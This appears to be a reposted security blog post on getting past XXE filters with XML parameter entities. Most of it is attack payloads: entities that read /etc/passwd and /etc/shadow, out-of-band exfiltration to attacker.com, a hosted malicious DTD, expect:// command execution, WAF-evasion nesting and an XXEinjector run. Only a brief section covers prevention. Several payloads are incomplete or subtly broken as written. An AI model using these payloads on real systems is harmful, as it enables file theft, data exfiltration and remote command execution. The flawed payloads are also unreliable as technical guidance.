Bypassing XXE Filters with Parameter Entities

By /

Listen to this Post

Ever wonder why your XXE payloads are getting blocked? Standard entity declarations like: 

<!ENTITY xxe SYSTEM "http://attacker-site.com/">

…are often filtered by security systems. However, parameter entities can bypass these restrictions.

You Should Know:

1. Parameter Entities vs. General Entities

General entities are blocked more frequently, while parameter entities (declared with %) evade detection: 

<!ENTITY % param_entity SYSTEM "file:///etc/passwd"> 
%param_entity;

2. Out-of-Band (OOB) Exploitation

Use parameter entities to exfiltrate data via DNS or HTTP: 

<!ENTITY % oob_entity SYSTEM "http://attacker.com/?exfil=%file;">

3. Bypassing Filters with Encoding

Try hex/URL encoding:

<!ENTITY % encoded_entity SYSTEM "http://attacker.com/%3Fdata%3D">

4. Local File Inclusion (LFI) via XXE

Extract files using:

<!ENTITY % lfi_entity SYSTEM "file:///etc/shadow">

5. Blind XXE Detection

Test with DNS callbacks:

<!ENTITY % blind_entity SYSTEM "http://attacker.burpcollaborator.net">

6. DTD External Reference

Host a malicious DTD:

<!ENTITY % ext_dtd SYSTEM "http://attacker.com/malicious.dtd"> 
%ext_dtd;

7. Linux/Windows Command Execution

For PHP-based apps:

<!ENTITY % cmd_entity SYSTEM "expect://id">

8. WAF Bypass Techniques

  • Use CDATA tags to mask payloads.
  • Nested entities: 
    <!ENTITY % nested1 "<!ENTITY &x25; nested2 SYSTEM 'http://attacker.com/'>">

9. Automated Testing with XXEinjector

Run:

ruby XXEinjector.rb --host=attacker.com --file=payload.xml

10. Prevention Checks

Disable external entities in XML parsers:

  • PHP: `libxml_disable_entity_loader(true);`
  • Java: `setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true);`

What Undercode Say

XXE remains a critical attack vector due to misconfigured XML parsers. Always test for:
– DTD processing in APIs (SOAP, REST).
– Server-side request forgery (SSRF) via external entities.
– File disclosure in cloud metadata endpoints (file:///proc/self/environ).
– Error-based XXE when OOB fails.

Use tools like Burp Suite, XXEinjector, and OOB-Server for detection.

Expected Output:

A successful XXE exploit exfiltrates sensitive data or executes remote commands. Always validate inputs and disable unnecessary XML features in production.

Relevant URLs:

References:

Reported By: Amitkumar711 Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: